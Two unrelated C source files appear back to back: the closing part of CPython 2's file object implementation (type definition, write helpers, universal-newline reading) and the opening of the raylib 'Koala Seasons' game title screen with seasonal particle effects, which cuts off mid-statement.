doesn't exist\n" "when opened for writing or appending; it will be truncated when\n" "opened for writing. Add a 'b' to the mode for binary files.\n" "Add a '+' to the mode to allow simultaneous reading and writing.\n" "If the buffering argument is given, 0 means unbuffered, 1 means line\n" "buffered, and larger numbers specify the buffer size. The preferred way\n" "to open a file is with the builtin open() function.\n" ) PyDoc_STR( "Add a 'U' to mode to open the file for input with universal newline\n" "support. Any line ending in the input file will be seen as a '\\n'\n" "in Python. Also, a file so opened gains the attribute 'newlines';\n" "the value for this attribute is one of None (no newline read yet),\n" "'\\r', '\\n', '\\r\\n' or a tuple containing all the newline types seen.\n" "\n" "'U' cannot be combined with 'w' or '+' mode.\n" ); PyTypeObject PyFile_Type = { PyVarObject_HEAD_INIT(&PyType_Type, 0) "file", sizeof(PyFileObject), 0, (destructor)file_dealloc, /* tp_dealloc */ 0, /* tp_print */ 0, /* tp_getattr */ 0, /* tp_setattr */ 0, /* tp_compare */ (reprfunc)file_repr, /* tp_repr */ 0, /* tp_as_number */ 0, /* tp_as_sequence */ 0, /* tp_as_mapping */ 0, /* tp_hash */ 0, /* tp_call */ 0, /* tp_str */ PyObject_GenericGetAttr, /* tp_getattro */ /* softspace is writable: we must supply tp_setattro */ PyObject_GenericSetAttr, /* tp_setattro */ 0, /* tp_as_buffer */ Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_WEAKREFS, /* tp_flags */ file_doc, /* tp_doc */ 0, /* tp_traverse */ 0, /* tp_clear */ 0, /* tp_richcompare */ offsetof(PyFileObject, weakreflist), /* tp_weaklistoffset */ (getiterfunc)file_self, /* tp_iter */ (iternextfunc)file_iternext, /* tp_iternext */ file_methods, /* tp_methods */ file_memberlist, /* tp_members */ file_getsetlist, /* tp_getset */ 0, /* tp_base */ 0, /* tp_dict */ 0, /* tp_descr_get */ 0, /* tp_descr_set */ 0, /* tp_dictoffset */ file_init, /* tp_init */ PyType_GenericAlloc, /* tp_alloc */ file_new, /* tp_new */ PyObject_Del, /* tp_free */ }; /* Interface for the 'soft space' between print items. */ int PyFile_SoftSpace(PyObject *f, int newflag) { long oldflag = 0; if (f == NULL) { /* Do nothing */ } else if (PyFile_Check(f)) { oldflag = ((PyFileObject *)f)->f_softspace; ((PyFileObject *)f)->f_softspace = newflag; } else { PyObject *v; v = PyObject_GetAttrString(f, "softspace"); if (v == NULL) PyErr_Clear(); else { if (PyInt_Check(v)) oldflag = PyInt_AsLong(v); assert(oldflag < INT_MAX); Py_DECREF(v); } v = PyInt_FromLong((long)newflag); if (v == NULL) PyErr_Clear(); else { if (PyObject_SetAttrString(f, "softspace", v) != 0) PyErr_Clear(); Py_DECREF(v); } } return (int)oldflag; } /* Interfaces to write objects/strings to file-like objects */ int PyFile_WriteObject(PyObject *v, PyObject *f, int flags) { PyObject *writer, *value, *args, *result; if (f == NULL) { PyErr_SetString(PyExc_TypeError, "writeobject with NULL file"); return -1; } else if (PyFile_Check(f)) { PyFileObject *fobj = (PyFileObject *) f; #ifdef Py_USING_UNICODE PyObject *enc = fobj->f_encoding; int result; #endif if (fobj->f_fp == NULL) { err_closed(); return -1; } #ifdef Py_USING_UNICODE if ((flags & Py_PRINT_RAW) && PyUnicode_Check(v) && enc != Py_None) { char *cenc = PyString_AS_STRING(enc); char *errors = fobj->f_errors == Py_None ? "strict" : PyString_AS_STRING(fobj->f_errors); value = PyUnicode_AsEncodedString(v, cenc, errors); if (value == NULL) return -1; } else { value = v; Py_INCREF(value); } result = file_PyObject_Print(value, fobj, flags); Py_DECREF(value); return result; #else return file_PyObject_Print(v, fobj, flags); #endif } writer = PyObject_GetAttrString(f, "write"); if (writer == NULL) return -1; if (flags & Py_PRINT_RAW) { if (PyUnicode_Check(v)) { value = v; Py_INCREF(value); } else value = PyObject_Str(v); } else value = PyObject_Repr(v); if (value == NULL) { Py_DECREF(writer); return -1; } args = PyTuple_Pack(1, value); if (args == NULL) { Py_DECREF(value); Py_DECREF(writer); return -1; } result = PyEval_CallObject(writer, args); Py_DECREF(args); Py_DECREF(value); Py_DECREF(writer); if (result == NULL) return -1; Py_DECREF(result); return 0; } int PyFile_WriteString(const char *s, PyObject *f) { if (f == NULL) { /* Should be caused by a pre-existing error */ if (!PyErr_Occurred()) PyErr_SetString(PyExc_SystemError, "null file for PyFile_WriteString"); return -1; } else if (PyFile_Check(f)) { PyFileObject *fobj = (PyFileObject *) f; FILE *fp = PyFile_AsFile(f); if (fp == NULL) { err_closed(); return -1; } FILE_BEGIN_ALLOW_THREADS(fobj) fputs(s, fp); FILE_END_ALLOW_THREADS(fobj) return 0; } else if (!PyErr_Occurred()) { PyObject *v = PyString_FromString(s); int err; if (v == NULL) return -1; err = PyFile_WriteObject(v, f, Py_PRINT_RAW); Py_DECREF(v); return err; } else return -1; } /* Try to get a file-descriptor from a Python object. If the object is an integer or long integer, its value is returned. If not, the object's fileno() method is called if it exists; the method must return an integer or long integer, which is returned as the file descriptor value. -1 is returned on failure. */ int PyObject_AsFileDescriptor(PyObject *o) { int fd; PyObject *meth; if (PyInt_Check(o)) { fd = _PyInt_AsInt(o); } else if (PyLong_Check(o)) { fd = _PyLong_AsInt(o); } else if ((meth = PyObject_GetAttrString(o, "fileno")) != NULL) { PyObject *fno = PyEval_CallObject(meth, NULL); Py_DECREF(meth); if (fno == NULL) return -1; if (PyInt_Check(fno)) { fd = _PyInt_AsInt(fno); Py_DECREF(fno); } else if (PyLong_Check(fno)) { fd = _PyLong_AsInt(fno); Py_DECREF(fno); } else { PyErr_SetString(PyExc_TypeError, "fileno() returned a non-integer"); Py_DECREF(fno); return -1; } } else { PyErr_SetString(PyExc_TypeError, "argument must be an int, or have a fileno() method"); return -1; } if (fd < 0) { PyErr_Format(PyExc_ValueError, "file descriptor cannot be a negative integer (%i)", fd); return -1; } return fd; } /* From here on we need access to the real fgets and fread */ #undef fgets #undef fread /* ** Py_UniversalNewlineFgets is an fgets variation that understands ** all of \r, \n and \r\n conventions. ** The stream should be opened in binary mode. ** If fobj is NULL the routine always does newline conversion, and ** it may peek one char ahead to gobble the second char in \r\n. ** If fobj is non-NULL it must be a PyFileObject. In this case there ** is no readahead but in stead a flag is used to skip a following ** \n on the next read. Also, if the file is open in binary mode ** the whole conversion is skipped. Finally, the routine keeps track of ** the different types of newlines seen. ** Note that we need no error handling: fgets() treats error and eof ** identically. */ char * Py_UniversalNewlineFgets(char *buf, int n, FILE *stream, PyObject *fobj) { char *p = buf; int c; int newlinetypes = 0; int skipnextlf = 0; int univ_newline = 1; if (fobj) { if (!PyFile_Check(fobj)) { errno = ENXIO; /* What can you do... */ return NULL; } univ_newline = ((PyFileObject *)fobj)->f_univ_newline; if ( !univ_newline ) return fgets(buf, n, stream); newlinetypes = ((PyFileObject *)fobj)->f_newlinetypes; skipnextlf = ((PyFileObject *)fobj)->f_skipnextlf; } FLOCKFILE(stream); c = 'x'; /* Shut up gcc warning */ while (--n > 0 && (c = GETC(stream)) != EOF ) { if (skipnextlf ) { skipnextlf = 0; if (c == '\n') { /* Seeing a \n here with skipnextlf true ** means we saw a \r before. */ newlinetypes |= NEWLINE_CRLF; c = GETC(stream); if (c == EOF) break; } else { /* ** Note that c == EOF also brings us here, ** so we're okay if the last char in the file ** is a CR. */ newlinetypes |= NEWLINE_CR; } } if (c == '\r') { /* A \r is translated into a \n, and we skip ** an adjacent \n, if any. We don't set the ** newlinetypes flag until we've seen the next char. */ skipnextlf = 1; c = '\n'; } else if ( c == '\n') { newlinetypes |= NEWLINE_LF; } *p++ = c; if (c == '\n') break; } if ( c == EOF && skipnextlf ) newlinetypes |= NEWLINE_CR; FUNLOCKFILE(stream); *p = '\0'; if (fobj) { ((PyFileObject *)fobj)->f_newlinetypes = newlinetypes; ((PyFileObject *)fobj)->f_skipnextlf = skipnextlf; } else if ( skipnextlf ) { /* If we have no file object we cannot save the ** skipnextlf flag. We have to readahead, which ** will cause a pause if we're reading from an ** interactive stream, but that is very unlikely ** unless we're doing something silly like ** execfile("/dev/tty"). */ c = GETC(stream); if ( c != '\n' ) ungetc(c, stream); } if (p == buf) return NULL; return buf; } /* ** Py_UniversalNewlineFread is an fread variation that understands ** all of \r, \n and \r\n conventions. ** The stream should be opened in binary mode. ** fobj must be a PyFileObject. In this case there ** is no readahead but in stead a flag is used to skip a following ** \n on the next read. Also, if the file is open in binary mode ** the whole conversion is skipped. Finally, the routine keeps track of ** the different types of newlines seen. */ size_t Py_UniversalNewlineFread(char *buf, size_t n, FILE *stream, PyObject *fobj) { char *dst = buf; PyFileObject *f = (PyFileObject *)fobj; int newlinetypes, skipnextlf; assert(buf != NULL); assert(stream != NULL); if (!fobj || !PyFile_Check(fobj)) { errno = ENXIO; /* What can you do... */ return 0; } if (!f->f_univ_newline) return fread(buf, 1, n, stream); newlinetypes = f->f_newlinetypes; skipnextlf = f->f_skipnextlf; /* Invariant: n is the number of bytes remaining to be filled * in the buffer. */ while (n) { size_t nread; int shortread; char *src = dst; nread = fread(dst, 1, n, stream); assert(nread <= n); if (nread == 0) break; n -= nread; /* assuming 1 byte out for each in; will adjust */ shortread = n != 0; /* true iff EOF or error */ while (nread--) { char c = *src++; if (c == '\r') { /* Save as LF and set flag to skip next LF. */ *dst++ = '\n'; skipnextlf = 1; } else if (skipnextlf && c == '\n') { /* Skip LF, and remember we saw CR LF. */ skipnextlf = 0; newlinetypes |= NEWLINE_CRLF; ++n; } else { /* Normal char to be stored in buffer. Also * update the newlinetypes flag if either this * is an LF or the previous char was a CR. */ if (c == '\n') newlinetypes |= NEWLINE_LF; else if (skipnextlf) newlinetypes |= NEWLINE_CR; *dst++ = c; skipnextlf = 0; } } if (shortread) { /* If this is EOF, update type flags. */ if (skipnextlf && feof(stream)) newlinetypes |= NEWLINE_CR; break; } } f->f_newlinetypes = newlinetypes; f->f_skipnextlf = skipnextlf; return dst - buf; } #ifdef __cplusplus } #endif
73234.c
/********************************************************************************************** * * raylib - Koala Seasons game * * Title Screen Functions Definitions (Init, Update, Draw, Unload) * * Copyright (c) 2014-2016 Ramon Santamaria (@raysan5) * * This software is provided "as-is", without any express or implied warranty. In no event * will the authors be held liable for any damages arising from the use of this software. * * Permission is granted to anyone to use this software for any purpose, including commercial * applications, and to alter it and redistribute it freely, subject to the following restrictions: * * 1. The origin of this software must not be misrepresented; you must not claim that you * wrote the original software. If you use this software in a product, an acknowledgment * in the product documentation would be appreciated but is not required. * * 2. Altered source versions must be plainly marked as such, and must not be misrepresented * as being the original software. * * 3. This notice may not be removed or altered from any source distribution. * **********************************************************************************************/ #include "raylib.h" #include "screens.h" #include <math.h> #include "atlas01.h" #include "atlas02.h" #define MAX_DURATION 120 #define MAX_particle 128 //---------------------------------------------------------------------------------- // Global Variables Definition (local to this module) //---------------------------------------------------------------------------------- typedef struct { Vector2 position; Vector2 speed; float rotation; float size; Color color; float alpha; float rotPhy; bool active; } Particle; typedef struct { Vector2 position; Color color; float alpha; float size; float rotation; bool active; // NOTE: Use it to activate/deactive particle bool fading; float delayCounter; } RayParticleTitle; typedef struct { Vector2 position; bool active; int spawnTime; int maxTime; Particle particle[1024]; } Stormparticleystem; typedef struct { Vector2 position; bool active; int spawnTime; int maxTime; Particle particle[MAX_particle]; } particleystemTitle; typedef struct { Vector2 position; bool active; int spawnTime; int maxTime; RayParticleTitle particle[20]; } RayparticleystemTitle; // Title screen global variables static int framesCounter; static int finishScreen; static int globalFrameCounter; static int currentFrame; static int thisFrame; static int parallaxBackOffset; static int parallaxFrontOffset; static float currentValue1; static float currentValue2; static float initValue1; static float initValue2; static float finishValue1; static float finishValue2; static float duration; static Vector2 fontSize; static bool soundActive; static bool musicActive; static Rectangle koalaMenu; static Rectangle bamboo[5]; static Rectangle player = {0, 0, 0, 0}; static Rectangle soundButton; static Rectangle speakerButton; static Color color00, color01, color02, color03; static particleystemTitle snowParticle; static particleystemTitle backSnowParticle; static particleystemTitle dandelionParticle; static particleystemTitle dandelionBackParticle; static particleystemTitle planetreeParticle; static particleystemTitle backPlanetreeParticle; static particleystemTitle flowerParticle; static particleystemTitle backFlowerParticle; static particleystemTitle rainParticle; static particleystemTitle backRainParticle; static RayparticleystemTitle rayparticle; static RayparticleystemTitle backRayparticle; static Stormparticleystem rainStormParticle; static Stormparticleystem snowStormParticle; const char pressToPlay[16] = "Press to play"; //---------------------------------------------------------------------------------- // Title Screen Functions Definition //---------------------------------------------------------------------------------- static void DrawParallaxFront(void); static void DrawParallaxMiddle(void); static void DrawParallaxBack(void); static float BounceEaseOut(float t,float b , float c, float d); // Title Screen Initialization logic void InitTitleScreen(void) { framesCounter = 0; finishScreen = 0; initValue1 = -100; finishValue1 = 100; initValue2 = 700; finishValue2 = finishValue1 + 220; duration = MAX_DURATION; initSeason = GetRandomValue(0, 3); soundActive = true; musicActive = true; parallaxBackOffset = GetRandomValue(10, 100); parallaxFrontOffset = GetRandomValue(100, 200); rainChance = GetRandomValue(0, 100); snowParticle.position = (Vector2){ 0, 0 }; snowParticle.active = false; backSnowParticle.position = (Vector2){ 0, 0 }; backSnowParticle.active = false; planetreeParticle.position = (Vector2){ 0, 0 }; planetreeParticle.active = false; backPlanetreeParticle.position = (Vector2){ 0, 0 }; backPlanetreeParticle.active = false; dandelionParticle.active = false; dandelionBackParticle.position = (Vector2){ 0, 0}; flowerParticle.position = (Vector2){ 0, 0 }; flowerParticle.active = false; backFlowerParticle.position = (Vector2){ 0, 0 }; backFlowerParticle.active = false; rayparticle.position = (Vector2){ 0, 0 }; rayparticle.active = false; backRayparticle.position = (Vector2){ 0, 0 }; backRayparticle.active = false; rainStormParticle.position = (Vector2){ 0, 0 }; rainStormParticle.active = false; snowStormParticle.position = (Vector2){ 0, 0 }; snowStormParticle.active = false; soundButton = (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.7, title_music_on.width, title_music_on.height }; speakerButton = (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.85, title_speaker_on.width, title_speaker_on.height }; for (int j = 0; j < MAX_particle; j++) { snowParticle.particle[j].active = false; snowParticle.particle[j].position = (Vector2){ 0, 0 }; snowParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; snowParticle.particle[j].rotation = GetRandomValue(0, 360); snowParticle.particle[j].color = WHITE; snowParticle.particle[j].alpha = 1.0f; backSnowParticle.particle[j].active = false; backSnowParticle.particle[j].position = (Vector2){ 0, 0 }; backSnowParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; backSnowParticle.particle[j].rotation = GetRandomValue(0, 360); backSnowParticle.particle[j].color = WHITE; backSnowParticle.particle[j].alpha = 0.7f; planetreeParticle.particle[j].active = false; planetreeParticle.particle[j].position = (Vector2){ 0, 0 }; planetreeParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; planetreeParticle.particle[j].rotation = GetRandomValue(0, 360); planetreeParticle.particle[j].color = WHITE; planetreeParticle.particle[j].alpha = 1.0f; backPlanetreeParticle.particle[j].active = false; backPlanetreeParticle.particle[j].position = (Vector2){ 0, 0 }; backPlanetreeParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; backPlanetreeParticle.particle[j].rotation = GetRandomValue(0, 360); backPlanetreeParticle.particle[j].color = WHITE; backPlanetreeParticle.particle[j].alpha = 0.7f; dandelionParticle.particle[j].active = false; dandelionParticle.particle[j].position = (Vector2){ 0, 0 }; dandelionParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; dandelionParticle.particle[j].rotation = 0; dandelionParticle.particle[j].color = WHITE; dandelionParticle.particle[j].alpha = 1; dandelionParticle.particle[j].rotPhy = GetRandomValue(0 , 180); dandelionBackParticle.particle[j].active = false; dandelionBackParticle.particle[j].position = (Vector2){ 0, 0 }; dandelionBackParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; dandelionBackParticle.particle[j].rotation = 0; dandelionBackParticle.particle[j].color = WHITE; dandelionBackParticle.particle[j].alpha = 0.7f; dandelionBackParticle.particle[j].rotPhy = GetRandomValue(0 , 180); flowerParticle.particle[j].active = false; flowerParticle.particle[j].position = (Vector2){ 0, 0 }; flowerParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; flowerParticle.particle[j].rotation = GetRandomValue(0, 360); flowerParticle.particle[j].color = WHITE; flowerParticle.particle[j].alpha = 1.0f; backFlowerParticle.particle[j].active = false; backFlowerParticle.particle[j].position = (Vector2){ 0, 0 }; backFlowerParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; backFlowerParticle.particle[j].rotation = GetRandomValue(0, 360); backFlowerParticle.particle[j].color = WHITE; backFlowerParticle.particle[j].alpha = 0.7f; rainParticle.particle[j].active = false; rainParticle.particle[j].position = (Vector2){ 0, 0 }; rainParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; rainParticle.particle[j].rotation = -20; rainParticle.particle[j].color = WHITE; rainParticle.particle[j].alpha = 1.0f; backRainParticle.particle[j].active = false; backRainParticle.particle[j].position = (Vector2){ 0, 0 }; backRainParticle.particle[j].size = (float)GetRandomValue(2, 8)/10; backRainParticle.particle[j].rotation = -20; backRainParticle.particle[j].color = WHITE; backRainParticle.particle[j].alpha = 0.7f; } for (int j = 0; j < 1024; j++) { rainStormParticle.particle[j].active = false; rainStormParticle.particle[j].position = (Vector2){ 0, 0 }; rainStormParticle.particle[j].size = (float)GetRandomValue(3, 9)/10; rainStormParticle.particle[j].rotation = -40; rainStormParticle.particle[j].color = WHITE; rainStormParticle.particle[j].alpha = 1.0f; } for (int j = 0; j < 256; j++) { snowStormParticle.particle[j].active = false; snowStormParticle.particle[j].position = (Vector2){ 0, 0 }; snowStormParticle.particle[j].size = (float)GetRandomValue(4, 8)/10; snowStormParticle.particle[j].rotation = 40; snowStormParticle.particle[j].color = WHITE; snowStormParticle.particle[j].alpha = 1.0f; } for (int i = 0; i < 20; i++) { rayparticle.particle[i].position = (Vector2){ 0, 0 }; rayparticle.particle[i].color.r = 255; rayparticle.particle[i].color.g = 255; rayparticle.particle[i].color.b = 182; rayparticle.particle[i].color.a = 255; rayparticle.particle[i].alpha = 0.0f; rayparticle.particle[i].size = (float)GetRandomValue(15, 20)/10; rayparticle.particle[i].rotation = 0.0f; rayparticle.particle[i].active = false; rayparticle.particle[i].fading = false; rayparticle.particle[i].delayCounter = 0; backRayparticle.particle[i].position = (Vector2){ 0, 0 }; backRayparticle.particle[i].color.r = 255; backRayparticle.particle[i].color.g = 255; backRayparticle.particle[i].color.b = 182; backRayparticle.particle[i].color.a = 255; backRayparticle.particle[i].alpha = 0.0f; backRayparticle.particle[i].size = (float)GetRandomValue(5, 10)/10; backRayparticle.particle[i].rotation = 0.0f; backRayparticle.particle[i].active = false; backRayparticle.particle[i].fading = false; backRayparticle.particle[i].delayCounter = 0; } for (int i = 0; i < 5; i++) { bamboo[i].x = 150 + 200*i; bamboo[i].y = 0; bamboo[i].width = 30; bamboo[i].height = GetScreenHeight(); } player.x = 350; player.y = 100; player.width = 35; player.height = 60; koalaMenu.x = gameplay_koala_menu.x; koalaMenu.y = gameplay_koala_menu.y; koalaMenu.width = gameplay_koala_menu.width/2; koalaMenu.height = gameplay_koala_menu.height; fontSize = MeasureTextEx(font, "PRESS TO PLAY", font.baseSize, 2); } // Title Screen Update logic void UpdateTitleScreen(void) { framesCounter += 1*TIME_FACTOR; globalFrameCounter += 1*TIME_FACTOR; if (framesCounter < duration) { currentValue1 = BounceEaseOut((float) framesCounter, initValue1, (finishValue1 - initValue1), duration); currentValue2 = BounceEaseOut((float) framesCounter, initValue2, (finishValue2 - initValue2), duration); } thisFrame += 1*TIME_FACTOR; if (thisFrame >= 40) { currentFrame++; thisFrame = 0; } if (currentFrame > 1) currentFrame = 0; koalaMenu.x = gameplay_koala_menu.x + koalaMenu.width*currentFrame; if (initSeason == 0) { dandelionParticle.active = true; dandelionBackParticle.active = true; rayparticle.active = true; backRayparticle.active = true; rainParticle.active = false; rainStormParticle.active = false; backRainParticle.active = false; color00 = (Color){129, 172, 86, 255}; // Summer Color color01 = (Color){145, 165, 125, 255}; color02 = (Color){161, 130, 73, 255}; color03 = (Color){198, 103, 51, 255}; } else if (initSeason == 1) { if (rainChance > 40) { planetreeParticle.active = true; backPlanetreeParticle.active = true; rainParticle.active = false; backRainParticle.active = false; } else if (rainChance <= 40 && rainChance > 15) { rainStormParticle.active = true; backRainParticle.active = false; } else if (rainChance <= 15) { rainStormParticle.active = true; backRainParticle.active = false; } color00 = (Color){242, 113, 62, 255}; // Fall Color color01 = (Color){190, 135, 114, 255}; color02 = (Color){144, 130, 101, 255}; color03 = (Color){214, 133, 58, 255}; } else if (initSeason == 2) { if (rainChance > 40) { snowParticle.active = true; backSnowParticle.active = true; } else { snowStormParticle.active = true; backSnowParticle.active = true; } rainParticle.active = false; rainStormParticle.active = false; backRainParticle.active = false; color00 = (Color){130, 130, 181, 255}; // Winter Color color01 = (Color){145, 145, 166, 255}; color02 = (Color){104, 142, 144, 255}; color03 = (Color){57, 140, 173, 255}; } else if (initSeason == 3) { flowerParticle.active = true; backFlowerParticle.active = true; rainParticle.active = false; rainStormParticle.active = false; backRainParticle.active = false; color00 = (Color){196, 176, 49, 255}; // Spring Color color01 = (Color){178, 163, 67, 255}; color02 = (Color){133, 143, 90, 255}; color03 = (Color){133, 156, 42, 255}; } // Snow Particle if (snowParticle.active) { snowParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!snowParticle.particle[i].active && snowParticle.spawnTime >= snowParticle.maxTime) { snowParticle.particle[i].active = true; snowParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; snowParticle.spawnTime = 0; snowParticle.maxTime = GetRandomValue (5, 20); } } } if (backSnowParticle.active) { backSnowParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!backSnowParticle.particle[i].active && backSnowParticle.spawnTime >= backSnowParticle.maxTime) { backSnowParticle.particle[i].active = true; backSnowParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; backSnowParticle.spawnTime = 0; backSnowParticle.maxTime = GetRandomValue (3, 10); } } } // Autumn leaves particle if (planetreeParticle.active) { planetreeParticle.spawnTime += 1*TIME_FACTOR; backPlanetreeParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!planetreeParticle.particle[i].active && planetreeParticle.spawnTime >= planetreeParticle.maxTime) { planetreeParticle.particle[i].active = true; planetreeParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; planetreeParticle.spawnTime = 0; planetreeParticle.maxTime = GetRandomValue (5, 20); } if (!backPlanetreeParticle.particle[i].active && backPlanetreeParticle.spawnTime >= backPlanetreeParticle.maxTime) { backPlanetreeParticle.particle[i].active = true; backPlanetreeParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; backPlanetreeParticle.spawnTime = 0; backPlanetreeParticle.maxTime = GetRandomValue (3, 10); } } } // Dandelion particle if (dandelionParticle.active) { dandelionParticle.spawnTime += 1*TIME_FACTOR; dandelionBackParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!dandelionParticle.particle[i].active && dandelionParticle.spawnTime >= dandelionParticle.maxTime) { dandelionParticle.particle[i].active = true; dandelionParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; dandelionParticle.spawnTime = 0; dandelionParticle.maxTime = GetRandomValue (5, 20); } if (!dandelionBackParticle.particle[i].active && dandelionBackParticle.spawnTime >= dandelionBackParticle.maxTime) { dandelionBackParticle.particle[i].active = true; dandelionBackParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; dandelionBackParticle.spawnTime = 0; dandelionBackParticle.maxTime = GetRandomValue (3, 10); } } } // Flower Particle if (flowerParticle.active) { flowerParticle.spawnTime += 1*TIME_FACTOR; backFlowerParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!flowerParticle.particle[i].active && flowerParticle.spawnTime >= flowerParticle.maxTime) { flowerParticle.particle[i].active = true; flowerParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; flowerParticle.spawnTime = 0; flowerParticle.maxTime = GetRandomValue (5, 20); } if (!backFlowerParticle.particle[i].active && backFlowerParticle.spawnTime >= backFlowerParticle.maxTime) { backFlowerParticle.particle[i].active = true; backFlowerParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; backFlowerParticle.spawnTime = 0; backFlowerParticle.maxTime = GetRandomValue (3, 10); } } } // Storm particle if (rainStormParticle.active) { rainStormParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < 1024; i++) { if (!rainStormParticle.particle[i].active && rainStormParticle.spawnTime >= rainStormParticle.maxTime) { for (int j = 0; j < 16; j++) { rainStormParticle.particle[i+j].active = true; rainStormParticle.particle[i+j].position = (Vector2){GetRandomValue(100, GetScreenWidth() + 1000), GetRandomValue(-10,-20)}; } rainStormParticle.spawnTime = 0; rainStormParticle.maxTime = 4; } } } // Snow Storm particle if (snowStormParticle.active) { snowStormParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < 256; i++) { if (!snowStormParticle.particle[i].active && snowStormParticle.spawnTime >= snowStormParticle.maxTime) { snowStormParticle.particle[i].active = true; snowStormParticle.particle[i].position = (Vector2){GetRandomValue(100, GetScreenWidth() + 800), -10}; snowStormParticle.spawnTime = 0; snowStormParticle.maxTime = GetRandomValue (1, 2); } } } if (rayparticle.active) { rayparticle.spawnTime += 1*TIME_FACTOR; backRayparticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < 20; i++) { if (!rayparticle.particle[i].active && rayparticle.spawnTime >= rayparticle.maxTime) { //printf("PARTICLEEES"); rayparticle.particle[i].active = true; rayparticle.particle[i].alpha = 0.0f; rayparticle.particle[i].size = (float)(GetRandomValue(10, 20)/10); rayparticle.particle[i].position = (Vector2){GetRandomValue(300, GetScreenWidth() + 200), 0}; rayparticle.particle[i].rotation = -35; rayparticle.spawnTime = 0; rayparticle.particle[i].delayCounter = 0; rayparticle.maxTime = GetRandomValue (20, 50); } if (!backRayparticle.particle[i].active && backRayparticle.spawnTime >= backRayparticle.maxTime) { backRayparticle.particle[i].active = true; backRayparticle.particle[i].alpha = 0.0f; backRayparticle.particle[i].size = (float)(GetRandomValue(5, 15)/10); backRayparticle.particle[i].position = (Vector2){GetRandomValue(300, GetScreenWidth() + 200), 0}; backRayparticle.particle[i].rotation = -35; backRayparticle.spawnTime = 0; backRayparticle.particle[i].delayCounter = 0; backRayparticle.maxTime = GetRandomValue (20, 50); } } } if (rainParticle.active) { rainParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!rainParticle.particle[i].active && rainParticle.spawnTime >= rainParticle.maxTime) { rainParticle.particle[i].active = true; rainParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; rainParticle.spawnTime = 0; rainParticle.maxTime = GetRandomValue (1, 8); } } } if (backRainParticle.active) { backRainParticle.spawnTime += 1*TIME_FACTOR; for (int i = 0; i < MAX_particle; i++) { if (!backRainParticle.particle[i].active && backRainParticle.spawnTime >= backRainParticle.maxTime) { backRainParticle.particle[i].active = true; backRainParticle.particle[i].position = (Vector2){GetRandomValue(0, GetScreenWidth() + 200), -10}; backRainParticle.spawnTime = 0; backRainParticle.maxTime = GetRandomValue (3, 10); } } } // particle Logic for (int i = 0; i < MAX_particle; i++) { if (snowParticle.particle[i].active) { snowParticle.particle[i].position.y += 2*TIME_FACTOR; snowParticle.particle[i].position.x -= 2*TIME_FACTOR; snowParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (snowParticle.particle[i].position.y >= GetScreenHeight()) snowParticle.particle[i].active = false; } if (backSnowParticle.particle[i].active) { backSnowParticle.particle[i].position.y += 4*TIME_FACTOR; backSnowParticle.particle[i].position.x -= 3*TIME_FACTOR; backSnowParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (backSnowParticle.particle[i].position.y >= GetScreenHeight()) backSnowParticle.particle[i].active = false; } if (planetreeParticle.particle[i].active) { planetreeParticle.particle[i].position.y += 4*TIME_FACTOR; planetreeParticle.particle[i].position.x -= 2*TIME_FACTOR; planetreeParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (planetreeParticle.particle[i].position.y >= GetScreenHeight()) planetreeParticle.particle[i].active = false; } if (backPlanetreeParticle.particle[i].active) { backPlanetreeParticle.particle[i].position.y += 4*TIME_FACTOR; backPlanetreeParticle.particle[i].position.x -= 3*TIME_FACTOR; backPlanetreeParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (backPlanetreeParticle.particle[i].position.y >= GetScreenHeight()) backPlanetreeParticle.particle[i].active = false; } if (dandelionParticle.particle[i].active) { dandelionParticle.particle[i].position.y += 2.5*TIME_FACTOR; dandelionParticle.particle[i].position.x -= 2*TIME_FACTOR; dandelionParticle.particle[i].rotation = -(30*sin(2*PI/120*globalFrameCounter + dandelionParticle.particle[i].rotPhy) + 30); if (dandelionParticle.particle[i].position.y >= GetScreenHeight()) dandelionParticle.particle[i].active = false; } if (dandelionBackParticle.particle[i].active) { dandelionBackParticle.particle[i].position.y += 2*TIME_FACTOR; dandelionBackParticle.particle[i].position.x -= 3*TIME_FACTOR; dandelionBackParticle.particle[i].rotation = -(30*sin(2*PI/120*globalFrameCounter + dandelionParticle.particle[i].rotPhy) + 30); if (dandelionBackParticle.particle[i].position.y >= GetScreenHeight()) dandelionBackParticle.particle[i].active = false; } if (flowerParticle.particle[i].active) { flowerParticle.particle[i].position.y += 2.5*TIME_FACTOR; 